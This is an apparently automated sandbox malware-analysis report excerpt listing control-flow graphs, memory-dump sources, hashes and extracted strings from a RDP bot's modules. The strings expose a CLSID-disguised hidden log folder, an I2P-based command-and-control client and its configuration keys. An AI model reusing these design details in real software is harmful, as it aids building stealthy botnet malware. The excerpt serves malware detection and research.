1233->1241 1234->1220 1235->1215 1236->1225 1237->1215 1246 7ffe0e13450d-7ffe0e134527 call 7ffe0e1340d2 1237->1246 1238->1215 1239->1215 1240->1215 1241->1215 1246->1231
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2982226441.00007FFE0E131000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFE0E130000, based on PE: true
    • Associated: 00000017.00000002.2980991323.00007FFE0E130000.00000002.00000001.01000000.0000000F.sdmpDownload File
    • Associated: 00000017.00000002.2982261410.00007FFE0E144000.00000002.00000001.01000000.0000000F.sdmpDownload File
    • Associated: 00000017.00000002.2982288459.00007FFE0E14D000.00000004.00000001.01000000.0000000F.sdmpDownload File
    • Associated: 00000017.00000002.2982320211.00007FFE0E150000.00000004.00000001.01000000.0000000F.sdmpDownload File
    • Associated: 00000017.00000002.2982349397.00007FFE0E151000.00000008.00000001.01000000.0000000F.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ffe0e130000_main.jbxd
    Similarity
    • API ID: strlen$CountCriticalErrorHandleInitializeLastModuleSectionSpinfopenstrcat
    • String ID: $C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\samctl.log$Done$P$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(log_cs) failed(gle=%lu)$[E] (%s) -> Log open failed(flog_path=%s)$[I] (%s) -> %s$[I] (%s) -> Log open success(flog_path=%s)$debug_init$log$samctl.l$~
    • API String ID: 3395718042-1297835036
    • Opcode ID: b0614e595e2ef35af0da5ab31b5bc4641b000a12823e34719f272f0289fdd3e6
    • Instruction ID: 3446df7952ef923491ba00410eccde7cdc74871520b3c0d932aefbf81c1d5a05
    • Opcode Fuzzy Hash: b0614e595e2ef35af0da5ab31b5bc4641b000a12823e34719f272f0289fdd3e6
    • Instruction Fuzzy Hash: 99513CA0F1C71786FA209720E8803BC6292EF45784F940437DADE577B6DE6DB986C701
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2983236501.00007FFE126D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE126D0000, based on PE: true
    • Associated: 00000017.00000002.2983191896.00007FFE126D0000.00000002.00000001.01000000.00000009.sdmpDownload File
    • Associated: 00000017.00000002.2983276516.00007FFE126E3000.00000004.00000001.01000000.00000009.sdmpDownload File
    • Associated: 00000017.00000002.2983306621.00007FFE126E4000.00000002.00000001.01000000.00000009.sdmpDownload File
    • Associated: 00000017.00000002.2983340803.00007FFE126ED000.00000004.00000001.01000000.00000009.sdmpDownload File
    • Associated: 00000017.00000002.2983376197.00007FFE126F0000.00000004.00000001.01000000.00000009.sdmpDownload File
    • Associated: 00000017.00000002.2983406046.00007FFE126F1000.00000008.00000001.01000000.00000009.sdmpDownload File
    • Associated: 00000017.00000002.2983443586.00007FFE126F4000.00000002.00000001.01000000.00000009.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ffe126d0000_main.jbxd
    Similarity
    • API ID: strlen$CountCriticalErrorHandleInitializeLastModuleSectionSpinfopenstrcat
    • String ID: $C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\cnccli.log$Done$P$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(log_cs) failed(gle=%lu)$[E] (%s) -> Log open failed(flog_path=%s)$[I] (%s) -> %s$[I] (%s) -> Log open success(flog_path=%s)$cnccli.l$debug_init$log$~
    • API String ID: 3395718042-315528054
    • Opcode ID: 92eb147a39bf0af526771b056e73237fb8298a1ca3136630c8ce15c9490be259
    • Instruction ID: c6b23c99fff702c524d5b8e809ed2ad5baf9465af827cc199772a7b8b53ebd66
    • Opcode Fuzzy Hash: 92eb147a39bf0af526771b056e73237fb8298a1ca3136630c8ce15c9490be259
    • Instruction Fuzzy Hash: E5513110E0CF8F86FB2A9B57AC903B81251AF55764F5400B2C58D0A6F6DEEDBA46C342
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2982869443.00007FFE11EC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFE11EC0000, based on PE: true
    • Associated: 00000017.00000002.2982773680.00007FFE11EC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
    • Associated: 00000017.00000002.2982917287.00007FFE11ED2000.00000002.00000001.01000000.0000000A.sdmpDownload File
    • Associated: 00000017.00000002.2983003921.00007FFE11EDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
    • Associated: 00000017.00000002.2983076043.00007FFE11EDE000.00000004.00000001.01000000.0000000A.sdmpDownload File
    • Associated: 00000017.00000002.2983101282.00007FFE11EDF000.00000008.00000001.01000000.0000000A.sdmpDownload File
    • Associated: 00000017.00000002.2983157453.00007FFE11EE2000.00000002.00000001.01000000.0000000A.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ffe11ec0000_main.jbxd
    Similarity
    • API ID: strlen$CountCriticalErrorHandleInitializeLastModuleSectionSpinfopenstrcat
    • String ID: $C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\dwlmgr.log$Done$P$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(log_cs) failed(gle=%lu)$[E] (%s) -> Log open failed(flog_path=%s)$[I] (%s) -> %s$[I] (%s) -> Log open success(flog_path=%s)$debug_init$dwlmgr.l$log$~
    • API String ID: 3395718042-2859552336
    • Opcode ID: bffcd5c302662170ebc8467d71a59c3773c8c83dc28d067ab71bf50396376f41
    • Instruction ID: 0d7ec2c4cfff20c98281c36c7aa59994371ecaea9df3f46de6b2b014c8e2df33
    • Opcode Fuzzy Hash: bffcd5c302662170ebc8467d71a59c3773c8c83dc28d067ab71bf50396376f41
    • Instruction Fuzzy Hash: CD51EA50E0CE17D1FF205B97AC803BA125DAF46774F9860B6C90E066B1EE6CF945D341

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 1249 7ffe0e16c9fc-7ffe0e16ca24 InitializeCriticalSectionAndSpinCount 1250 7ffe0e16cb50-7ffe0e16cb71 GetLastError call 7ffe0e16c852 1249->1250 1251 7ffe0e16ca2a-7ffe0e16ca5e call 7ffe0e16b930 call 7ffe0e16466b 1249->1251 1256 7ffe0e16cb92-7ffe0e16cb98 1250->1256 1257 7ffe0e16cb73 1250->1257 1266 7ffe0e16cb29-7ffe0e16cb41 call 7ffe0e16c852 1251->1266 1267 7ffe0e16ca64-7ffe0e16ca7b strlen 1251->1267 1262 7ffe0e16cb9e-7ffe0e16cba4 1256->1262 1263 7ffe0e16cc5b 1256->1263 1259 7ffe0e16cc51-7ffe0e16cc56 1257->1259 1260 7ffe0e16cb79-7ffe0e16cb86 1257->1260 1259->1266 1260->1256 1264 7ffe0e16cbd0-7ffe0e16cbd3 1262->1264 1265 7ffe0e16cba6-7ffe0e16cbac 1262->1265 1272 7ffe0e16cc65-7ffe0e16cc6a 1263->1272 1273 7ffe0e16cbd5-7ffe0e16cbd8 1264->1273 1274 7ffe0e16cbed-7ffe0e16cbf3 1264->1274 1270 7ffe0e16cbb2-7ffe0e16cbb8 1265->1270 1271 7ffe0e16cc79-7ffe0e16cc7e 1265->1271 1285 7ffe0e16cb46-7ffe0e16cb4f 1266->1285 1268 7ffe0e16ca93-7ffe0e16ca96 1267->1268 1269 7ffe0e16ca7d-7ffe0e16ca80 1267->1269 1279 7ffe0e16cab8-7ffe0e16cb01 strlen fopen 1268->1279 1280 7ffe0e16ca98-7ffe0e16cab2 strcat strlen 1268->1280 1269->1268 1276 7ffe0e16ca82-7ffe0e16ca8f strlen 1269->1276 1277 7ffe0e16cc83-7ffe0e16cc88 1270->1277 1278 7ffe0e16cbbe-7ffe0e16cbc4 1270->1278 1271->1266 1272->1266 1281 7ffe0e16cbda-7ffe0e16cbdd 1273->1281 1282 7ffe0e16cc47 1273->1282 1283 7ffe0e16cbf5-7ffe0e16cbfa 1274->1283 1284 7ffe0e16cc6f 1274->1284 1276->1268 1277->1266 1286 7ffe0e16cbff-7ffe0e16cc04 1278->1286 1287 7ffe0e16cbc6-7ffe0e16cbcb 1278->1287 1288 7ffe0e16cc1d-7ffe0e16cc38 call 7ffe0e16c852 1279->1288 1289 7ffe0e16cb07-7ffe0e16cb23 call 7ffe0e16c852 1279->1289 1280->1279 1281->1272 1290 7ffe0e16cbe3-7ffe0e16cbe8 1281->1290 1282->1259 1283->1266 1284->1271 1286->1266 1287->1266 1288->1266 1289->1266 1295 7ffe0e16cc8d-7ffe0e16cca7 call 7ffe0e16c852 1289->1295 1290->1266 1295->1285
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2982412926.00007FFE0E161000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFE0E160000, based on PE: true
    • Associated: 00000017.00000002.2982385098.00007FFE0E160000.00000002.00000001.01000000.0000000E.sdmpDownload File
    • Associated: 00000017.00000002.2982444726.00007FFE0E176000.00000002.00000001.01000000.0000000E.sdmpDownload File
    • Associated: 00000017.00000002.2982471694.00007FFE0E180000.00000004.00000001.01000000.0000000E.sdmpDownload File
    • Associated: 00000017.00000002.2982500156.00007FFE0E183000.00000004.00000001.01000000.0000000E.sdmpDownload File
    • Associated: 00000017.00000002.2982529491.00007FFE0E184000.00000008.00000001.01000000.0000000E.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ffe0e160000_main.jbxd
    Similarity
    • API ID: strlen$CountCriticalErrorHandleInitializeLastModuleSectionSpinfopenstrcat
    • String ID: $C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\rdpctl.log$Done$P$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(log_cs) failed(gle=%lu)$[E] (%s) -> Log open failed(flog_path=%s)$[I] (%s) -> %s$[I] (%s) -> Log open success(flog_path=%s)$debug_init$log$rdpctl.l$~
    • API String ID: 3395718042-1794035234
    • Opcode ID: 6027abe810c91d6276c2aaa921a9be34cca8ee7fe377f6c5f3108819849dfb22
    • Instruction ID: cde0a4fe7b768f3fe95b3f89205d6ea1666cbe0cad51e2798928e9c30ca13b89
    • Opcode Fuzzy Hash: 6027abe810c91d6276c2aaa921a9be34cca8ee7fe377f6c5f3108819849dfb22
    • Instruction Fuzzy Hash: 6E514D60E1C707C1FB609B55F9803B99261AF58B84FA45033C9CD466B7EE6DB98AC3C1

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 1298 7ffe0eb49f6c-7ffe0eb49f94 InitializeCriticalSectionAndSpinCount 1299 7ffe0eb4a0c0-7ffe0eb4a0e1 GetLastError call 7ffe0eb49dc2 1298->1299 1300 7ffe0eb49f9a-7ffe0eb49fce call 7ffe0eb44ac0 call 7ffe0eb489db 1298->1300 1305 7ffe0eb4a102-7ffe0eb4a108 1299->1305 1306 7ffe0eb4a0e3 1299->1306 1313 7ffe0eb49fd4-7ffe0eb49feb strlen 1300->1313 1314 7ffe0eb4a099-7ffe0eb4a0b1 call 7ffe0eb49dc2 1300->1314 1311 7ffe0eb4a10e-7ffe0eb4a114 1305->1311 1312 7ffe0eb4a1cb 1305->1312 1308 7ffe0eb4a1c1-7ffe0eb4a1c6 1306->1308 1309 7ffe0eb4a0e9-7ffe0eb4a0f6 1306->1309 1308->1314 1309->1305 1315 7ffe0eb4a140-7ffe0eb4a143 1311->1315 1316 7ffe0eb4a116-7ffe0eb4a11c 1311->1316 1322 7ffe0eb4a1d5-7ffe0eb4a1da 1312->1322 1318 7ffe0eb4a003-7ffe0eb4a006 1313->1318 1319 7ffe0eb49fed-7ffe0eb49ff0 1313->1319 1329 7ffe0eb4a0b6-7ffe0eb4a0bf 1314->1329 1323 7ffe0eb4a145-7ffe0eb4a148 1315->1323 1324 7ffe0eb4a15d-7ffe0eb4a163 1315->1324 1320 7ffe0eb4a122-7ffe0eb4a128 1316->1320 1321 7ffe0eb4a1e9-7ffe0eb4a1ee 1316->1321 1333 7ffe0eb4a028-7ffe0eb4a071 strlen fopen 1318->1333 1334 7ffe0eb4a008-7ffe0eb4a022 strcat strlen 1318->1334 1319->1318 1330 7ffe0eb49ff2-7ffe0eb49fff strlen 1319->1330 1331 7ffe0eb4a1f3-7ffe0eb4a1f8 1320->1331 1332 7ffe0eb4a12e-7ffe0eb4a134 1320->1332 1321->1314 1322->1314 1325 7ffe0eb4a14a-7ffe0eb4a14d 1323->1325 1326 7ffe0eb4a1b7 1323->1326 1327 7ffe0eb4a165-7ffe0eb4a16a 1324->1327 1328 7ffe0eb4a1df 1324->1328 1325->1322 1335 7ffe0eb4a153-7ffe0eb4a158 1325->1335 1326->1308 1327->1314 1328->1321 1330->1318 1331->1314 1336 7ffe0eb4a16f-7ffe0eb4a174 1332->1336 1337 7ffe0eb4a136-7ffe0eb4a13b 1332->1337 1338 7ffe0eb4a18d-7ffe0eb4a1a8 call 7ffe0eb49dc2 1333->1338 1339 7ffe0eb4a077-7ffe0eb4a093 call 7ffe0eb49dc2 1333->1339 1334->1333 1335->1314 1336->1314 1337->1314 1338->1314 1339->1314 1344 7ffe0eb4a1fd-7ffe0eb4a217 call 7ffe0eb49dc2 1339->1344 1344->1329
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2982612085.00007FFE0EB41000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE0EB40000, based on PE: true
    • Associated: 00000017.00000002.2982583990.00007FFE0EB40000.00000002.00000001.01000000.0000000D.sdmpDownload File
    • Associated: 00000017.00000002.2982645078.00007FFE0EB53000.00000002.00000001.01000000.0000000D.sdmpDownload File
    • Associated: 00000017.00000002.2982679325.00007FFE0EB5C000.00000004.00000001.01000000.0000000D.sdmpDownload File
    • Associated: 00000017.00000002.2982718497.00007FFE0EB5F000.00000004.00000001.01000000.0000000D.sdmpDownload File
    • Associated: 00000017.00000002.2982747189.00007FFE0EB60000.00000008.00000001.01000000.0000000D.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ffe0eb40000_main.jbxd
    Similarity
    • API ID: strlen$CountCriticalErrorHandleInitializeLastModuleSectionSpinfopenstrcat
    • String ID: $C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\prgmgr.log$Done$P$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(log_cs) failed(gle=%lu)$[E] (%s) -> Log open failed(flog_path=%s)$[I] (%s) -> %s$[I] (%s) -> Log open success(flog_path=%s)$debug_init$log$prgmgr.l$~
    • API String ID: 3395718042-2735303109
    • Opcode ID: 0f974067a7b01bfcb567c9b154fe3c9fed70ccc92048bb515eb0e9eca9cefbbc
    • Instruction ID: f88535bcff432729d4c9be8b4681dcf8c30f64bac30f4d9a76e2e46d6225df47
    • Opcode Fuzzy Hash: 0f974067a7b01bfcb567c9b154fe3c9fed70ccc92048bb515eb0e9eca9cefbbc
    • Instruction Fuzzy Hash: F95156D2B4C71382FB329F54A8803B96655EF45784F840433DA8E463B2EE6DA94ACF01
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2983500227.00007FFE13381000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE13380000, based on PE: true
    • Associated: 00000017.00000002.2983478738.00007FFE13380000.00000002.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983526612.00007FFE13390000.00000002.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983553402.00007FFE13398000.00000004.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983584457.00007FFE1339B000.00000004.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983614495.00007FFE1339C000.00000008.00000001.01000000.0000000B.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ffe13380000_main.jbxd
    Similarity
    • API ID: OpenQueryValuefflushfwrite
    • String ID: $ $(key != NULL)$(root != NULL)$(value != NULL)$(value_sz != NULL)$C:/Projects/rdp/bot/codebase/registry.c$NULL$P$P$[D] (%s) -> Done(root=0x%p,key=%s,param=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$[E] (%s) -> RegOpenKeyA failed(root=0x%p,key=%s,res=%lu)$[E] (%s) -> RegQueryValueA failed(root=0x%p,key=%s,param=%s,res=%lu)$registry_get_value
    • API String ID: 1980715187-3890537267
    • Opcode ID: 84e1102881e14aa1f1fe1744a6ea1b08f4cca0e5c6733abdbc1240c36314e2db
    • Instruction ID: b225aa560ec1029663cda079ead0c46d196ad7f4065747b7d859ba0645c35e4e
    • Opcode Fuzzy Hash: 84e1102881e14aa1f1fe1744a6ea1b08f4cca0e5c6733abdbc1240c36314e2db
    • Instruction Fuzzy Hash: C0A1626190CF078DF6609746A4403BC6255AF64768F5002F2D93E76BB1EE6DE9C9C30E
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2982226441.00007FFE0E131000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFE0E130000, based on PE: true
    • Associated: 00000017.00000002.2980991323.00007FFE0E130000.00000002.00000001.01000000.0000000F.sdmpDownload File
    • Associated: 00000017.00000002.2982261410.00007FFE0E144000.00000002.00000001.01000000.0000000F.sdmpDownload File
    • Associated: 00000017.00000002.2982288459.00007FFE0E14D000.00000004.00000001.01000000.0000000F.sdmpDownload File
    • Associated: 00000017.00000002.2982320211.00007FFE0E150000.00000004.00000001.01000000.0000000F.sdmpDownload File
    • Associated: 00000017.00000002.2982349397.00007FFE0E151000.00000008.00000001.01000000.0000000F.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ffe0e130000_main.jbxd
    Similarity
    • API ID: OpenQueryValuefflushfwrite
    • String ID: $ $(key != NULL)$(root != NULL)$(value != NULL)$(value_sz != NULL)$C:/Projects/rdp/bot/codebase/registry.c$NULL$P$P$[D] (%s) -> Done(root=0x%p,key=%s,param=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$[E] (%s) -> RegOpenKeyA failed(root=0x%p,key=%s,res=%lu)$[E] (%s) -> RegQueryValueA failed(root=0x%p,key=%s,param=%s,res=%lu)$registry_get_value
    • API String ID: 1980715187-3890537267
    • Opcode ID: e4ee0b8c682a28aa6920e3dfb83186395f0b78e0f3a49e04670c579f188d5a39
    • Instruction ID: 2c8b2ff43641bc64481b6fc2e5ca9f3f6f7c3f00105af2e0659aa4aa7d5be45e
    • Opcode Fuzzy Hash: e4ee0b8c682a28aa6920e3dfb83186395f0b78e0f3a49e04670c579f188d5a39
    • Instruction Fuzzy Hash: 53A15FE1E0C74B96FA709724A8403B93250AF44744F640137DAFE467B1EEADFA85D30A
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2983236501.00007FFE126D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE126D0000, based on PE: true
    • Associated: 00000017.00000002.2983191896.00007FFE126D0000.00000002.00000001.01000000.00000009.sdmpDownload File
    • Associated: 00000017.00000002.2983276516.00007FFE126E3000.00000004.00000001.01000000.00000009.sdmpDownload File
    • Associated: 00000017.00000002.2983306621.00007FFE126E4000.00000002.00000001.01000000.00000009.sdmpDownload File
    • Associated: 00000017.00000002.2983340803.00007FFE126ED000.00000004.00000001.01000000.00000009.sdmpDownload File
    • Associated: 00000017.00000002.2983376197.00007FFE126F0000.00000004.00000001.01000000.00000009.sdmpDownload File
    • Associated: 00000017.00000002.2983406046.00007FFE126F1000.00000008.00000001.01000000.00000009.sdmpDownload File
    • Associated: 00000017.00000002.2983443586.00007FFE126F4000.00000002.00000001.01000000.00000009.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ffe126d0000_main.jbxd
    Similarity
    • API ID: OpenQueryValuefflushfwrite
    • String ID: $ $(key != NULL)$(root != NULL)$(value != NULL)$(value_sz != NULL)$C:/Projects/rdp/bot/codebase/registry.c$NULL$P$P$[D] (%s) -> Done(root=0x%p,key=%s,param=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$[E] (%s) -> RegOpenKeyA failed(root=0x%p,key=%s,res=%lu)$[E] (%s) -> RegQueryValueA failed(root=0x%p,key=%s,param=%s,res=%lu)$registry_get_value
    • API String ID: 1980715187-3890537267
    • Opcode ID: c58dddacb13cd698f5fa2026c6a9a98a7888e7b119fb0002abfa16e503a29b1d
    • Instruction ID: 7cebe01bcea15db94eebf4fe5f89be2fa2a6f736a33d0c58442c74e04a7b98a1
    • Opcode Fuzzy Hash: c58dddacb13cd698f5fa2026c6a9a98a7888e7b119fb0002abfa16e503a29b1d
    • Instruction Fuzzy Hash: AAA1422690DF4F87FA20FB07AC407782250AF60764F5401B2D99E466F1EEEDE985C782
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2982869443.00007FFE11EC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFE11EC0000, based on PE: true
    • Associated: 00000017.00000002.2982773680.00007FFE11EC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
    • Associated: 00000017.00000002.2982917287.00007FFE11ED2000.00000002.00000001.01000000.0000000A.sdmpDownload File
    • Associated: 00000017.00000002.2983003921.00007FFE11EDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
    • Associated: 00000017.00000002.2983076043.00007FFE11EDE000.00000004.00000001.01000000.0000000A.sdmpDownload File
    • Associated: 00000017.00000002.2983101282.00007FFE11EDF000.00000008.00000001.01000000.0000000A.sdmpDownload File
    • Associated: 00000017.00000002.2983157453.00007FFE11EE2000.00000002.00000001.01000000.0000000A.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ffe11ec0000_main.jbxd
    Similarity
    • API ID: OpenQueryValuefflushfwrite
    • String ID: $ $(key != NULL)$(root != NULL)$(value != NULL)$(value_sz != NULL)$C:/Projects/rdp/bot/codebase/registry.c$NULL$P$P$[D] (%s) -> Done(root=0x%p,key=%s,param=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$[E] (%s) -> RegOpenKeyA failed(root=0x%p,key=%s,res=%lu)$[E] (%s) -> RegQueryValueA failed(root=0x%p,key=%s,param=%s,res=%lu)$registry_get_value
    • API String ID: 1980715187-3890537267
    • Opcode ID: 67cfbe663f343971c6fe7e85701b994eac7cc84ec6e756fd20b4d9e1f579e884
    • Instruction ID: 3b864f7f0a7b44b38e01e7fa985efcbfa4307e9bd24ce54776d4e14f2aacf50e
    • Opcode Fuzzy Hash: 67cfbe663f343971c6fe7e85701b994eac7cc84ec6e756fd20b4d9e1f579e884
    • Instruction Fuzzy Hash: 0FA11E20D0CF4B85FF209786AD4037B265CAF047A8ED411B2DA5E466B1EE6DF985A703
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2982412926.00007FFE0E161000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFE0E160000, based on PE: true
    • Associated: 00000017.00000002.2982385098.00007FFE0E160000.00000002.00000001.01000000.0000000E.sdmpDownload File
    • Associated: 00000017.00000002.2982444726.00007FFE0E176000.00000002.00000001.01000000.0000000E.sdmpDownload File
    • Associated: 00000017.00000002.2982471694.00007FFE0E180000.00000004.00000001.01000000.0000000E.sdmpDownload File
    • Associated: 00000017.00000002.2982500156.00007FFE0E183000.00000004.00000001.01000000.0000000E.sdmpDownload File
    • Associated: 00000017.00000002.2982529491.00007FFE0E184000.00000008.00000001.01000000.0000000E.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ffe0e160000_main.jbxd
    Similarity
    • API ID: OpenQueryValuefflushfwrite
    • String ID: $ $(key != NULL)$(root != NULL)$(value != NULL)$(value_sz != NULL)$C:/Projects/rdp/bot/codebase/registry.c$NULL$P$P$[D] (%s) -> Done(root=0x%p,key=%s,param=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$[E] (%s) -> RegOpenKeyA failed(root=0x%p,key=%s,res=%lu)$[E] (%s) -> RegQueryValueA failed(root=0x%p,key=%s,param=%s,res=%lu)$registry_get_value
    • API String ID: 1980715187-3890537267
    • Opcode ID: 66ec8f2da1124808f01955d1185ca8855145a8341d6aaae69ba7b0c838185223
    • Instruction ID: 24626e7d7beb5001e1f70c89204de26ab9039bfde02e98cafc13826f60c1dc26
    • Opcode Fuzzy Hash: 66ec8f2da1124808f01955d1185ca8855145a8341d6aaae69ba7b0c838185223
    • Instruction Fuzzy Hash: 87A14061D0C74B81FA709B00E9443B96266AF00B4AF540533D9DE07AF7FEADE985D342
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2982612085.00007FFE0EB41000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE0EB40000, based on PE: true
    • Associated: 00000017.00000002.2982583990.00007FFE0EB40000.00000002.00000001.01000000.0000000D.sdmpDownload File
    • Associated: 00000017.00000002.2982645078.00007FFE0EB53000.00000002.00000001.01000000.0000000D.sdmpDownload File
    • Associated: 00000017.00000002.2982679325.00007FFE0EB5C000.00000004.00000001.01000000.0000000D.sdmpDownload File
    • Associated: 00000017.00000002.2982718497.00007FFE0EB5F000.00000004.00000001.01000000.0000000D.sdmpDownload File
    • Associated: 00000017.00000002.2982747189.00007FFE0EB60000.00000008.00000001.01000000.0000000D.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ffe0eb40000_main.jbxd
    Similarity
    • API ID: OpenQueryValuefflushfwrite
    • String ID: $ $(key != NULL)$(root != NULL)$(value != NULL)$(value_sz != NULL)$C:/Projects/rdp/bot/codebase/registry.c$NULL$P$P$[D] (%s) -> Done(root=0x%p,key=%s,param=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$[E] (%s) -> RegOpenKeyA failed(root=0x%p,key=%s,res=%lu)$[E] (%s) -> RegQueryValueA failed(root=0x%p,key=%s,param=%s,res=%lu)$registry_get_value
    • API String ID: 1980715187-3890537267
    • Opcode ID: 5cf81db9f808f48a717ee55fb56b084ce3dae9e65be7d2129b8af3ede309d251
    • Instruction ID: 002258ca19b8236890ad9813d6531bbab5073eb994503a5f0a2bd5543ef8730f
    • Opcode Fuzzy Hash: 5cf81db9f808f48a717ee55fb56b084ce3dae9e65be7d2129b8af3ede309d251
    • Instruction Fuzzy Hash: FFA15EA1D0C74B91F671AF84A8403792290EF55744F584132DAEF067F5EE6DEA85CF02
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2983236501.00007FFE126D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE126D0000, based on PE: true
    • Associated: 00000017.00000002.2983191896.00007FFE126D0000.00000002.00000001.01000000.00000009.sdmpDownload File
    • Associated: 00000017.00000002.2983276516.00007FFE126E3000.00000004.00000001.01000000.00000009.sdmpDownload File
    • Associated: 00000017.00000002.2983306621.00007FFE126E4000.00000002.00000001.01000000.00000009.sdmpDownload File
    • Associated: 00000017.00000002.2983340803.00007FFE126ED000.00000004.00000001.01000000.00000009.sdmpDownload File
    • Associated: 00000017.00000002.2983376197.00007FFE126F0000.00000004.00000001.01000000.00000009.sdmpDownload File
    • Associated: 00000017.00000002.2983406046.00007FFE126F1000.00000008.00000001.01000000.00000009.sdmpDownload File
    • Associated: 00000017.00000002.2983443586.00007FFE126F4000.00000002.00000001.01000000.00000009.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ffe126d0000_main.jbxd
    Similarity
    • API ID: CreateErrorLastThread
    • String ID: $Done$P$[E] (%s) -> CreateThread(%s) failed(gle=%lu)$[E] (%s) -> Failed(err=%08x)$[I] (%s) -> %s$[I] (%s) -> CreateThread(%s) done$cnc_init$cnccli$i2p_addr$i2p_sam3_timeo$i2p_try_num$routine_rx$server_host$server_port$server_timeo$~
    • API String ID: 1689873465-2891999747
    • Opcode ID: e903d144b2f44c2a2033eeb375ea37c3a0dd4a55feb76df5ed730789ba93a5fb
    • Instruction ID: b912d05165c13265801ac6f4ac3107c28b83f0e97c3a4b7d638854fcd565f2da
    • Opcode Fuzzy Hash: e903d144b2f44c2a2033eeb375ea37c3a0dd4a55feb76df5ed730789ba93a5fb
    • Instruction Fuzzy Hash: 09911964A0DF8F96FB60DB16AC847B82294AF14778F5002B1C99D462F9EFECE945C341
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2979442400.00007FF6EF651000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6EF650000, based on PE: true
    • Associated: 00000017.00000002.2979419222.00007FF6EF650000.00000002.00000001.01000000.00000008.sdmpDownload File
    • Associated: 00000017.00000002.2979465592.00007FF6EF660000.00000002.00000001.01000000.00000008.sdmpDownload File
    • Associated: 00000017.00000002.2979493170.00007FF6EF668000.00000004.00000001.01000000.00000008.sdmpDownload File
    • Associated: 00000017.00000002.2979493170.00007FF6EF66A000.00000004.00000001.01000000.00000008.sdmpDownload File
    • Associated: 00000017.00000002.2979544533.00007FF6EF66E000.00000002.00000001.01000000.00000008.sdmpDownload File
    Joe Sandbox IDA Plugin
